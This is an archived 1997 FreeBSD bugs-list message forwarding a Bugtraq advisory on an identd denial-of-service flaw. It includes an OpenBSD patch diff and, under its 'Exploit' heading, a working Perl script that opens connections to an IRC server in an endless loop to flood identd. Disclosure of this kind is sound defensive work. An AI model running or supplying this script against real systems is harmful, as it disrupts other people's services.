From owner-freebsd-bugs Mon Aug 4 09:15:42 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA08193 for bugs-outgoing; Mon, 4 Aug 1997 09:15:42 -0700 (PDT) Received: from relay.ucb.crimea.ua (ru@relay.ucb.crimea.ua [194.93.177.113]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA08177 for ; Mon, 4 Aug 1997 09:15:22 -0700 (PDT) Received: (from ru@localhost) by relay.ucb.crimea.ua (8.8.5/8.8.5) id TAA23764 for freebsd-bugs@freebsd.org; Mon, 4 Aug 1997 19:14:18 +0300 (EET DST) From: Ruslan Ermilov Message-Id: <199708041614.TAA23764@relay.ucb.crimea.ua> Subject: CPSR #8: identd Denial of Service (fwd) To: freebsd-bugs@freebsd.org Date: Mon, 4 Aug 1997 19:14:17 +0300 (EET DST) X-My-Interests: Unix,Oracle,Networking X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-freebsd-bugs@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Once Corinne Posse Releases wrote: >From owner-bugtraq@NETSPACE.ORG Mon Aug 4 18:12:57 1997 Approved-By: aleph1@UNDERGROUND.ORG X-Sender: releases@corinne.cpio.org MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Mon, 4 Aug 1997 09:19:54 -0500 Reply-To: Corinne Posse Releases Sender: Bugtraq List From: Corinne Posse Releases Subject: CPSR #8: identd Denial of Service To: BUGTRAQ@NETSPACE.ORG ************** Corinne Posse Security Notice ************** Issue Number 8: 970803 ************** http://posse.cpio.org ************** **** Denial of Service care of identd **** A massive amount of authorization requests to identd (pidentd and others) can cause system load to skyrocket, making the system unusable. Affected Sites: FreeBSD, NetBSD, Linux, SCO, Solaris, IRIX, and OpenBSD prior to 8/1/97. ANY system running pidentd. Problem: A massive amount of ident requests causes the identd daemon to "spin" because the daemon does not correctly close the socket from the host that issues a request. This is due to a poorly implemented incantation of wait(). The improper code perpetuates the identd process and allows the process to hang, slowing system performance considerably. On average, 2-3 spinning processes slow the system noticeably-- 10-15 make the system unusable. Bear in mind that this is all based on the speed of the system and the above numbers hold true for machines like a p5/100 with 32M of RAM. Simply "kill -9 (ident's PIDs)" fixes the problem if it occurs. Fix: Thanks to Theo de Raadt of the OpenBSD project, we are proud to announce that OpenBSD has fixed this problem, and that the following patches are available. OpenBSD uses a modified version of pidentd. Index: libexec/identd/identd.c =================================================================== RCS file: /cvs/src/libexec/identd/identd.c,v retrieving revision 1.4 retrieving revision 1.5 diff -r1.4 -r1.5 2c2 < ** $Id: identd.c,v 1.4 1997/07/23 20:36:27 kstailey Exp $ --- > ** $Id: identd.c,v 1.5 1997/07/29 07:49:31 deraadt Exp $ 180a181 > int save_errno = errno; 184a186 > errno = save_errno; Exploit: This problem was discovered simultaneously by Jack0 as well as Jonathan Katz. Jack0 noticed that a user's repeated requests to an IRC server spawned many identd processes on his local machine, bringing his box to a crawl. Jon noticed that after someone sent email to the various mailing lists he runs, the many hosts receiving the mail would make ident requests and leave his system paralyzed. To see if your system is vulnerable, Jack0 has come up with a PERL script that repeatedly tries to connect to an IRC server. With a little tinkering, the script can be used to adapt to a variety of different services if you want or need to test other services. #!/usr/bin/perl # Ident abuse script which can be used to test for the identd vulnerability # on the local system. # jack0@cpio.org for questions #include use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 6667 if (!$ARGV[1]); if (!$h) { print "Host name most be specified i.e.,; some.server.net\n"; } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); &connect; sub connect { print "Connection in progress:\n"; socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; print "QUIT\n"; select STDOUT; close S; &connect; } Concept by: Jack0 (jack0@cpio.org) and Jonathan Katz (jkatz@cpio.org) Special Thanks To: Theo de Raadt -- Ruslan A. Ermilov System Administrator ru@ucb.crimea.ua United Commercial Bank +380-652-247647 Simferopol, Crimea 2426679 ICQ Network, UIN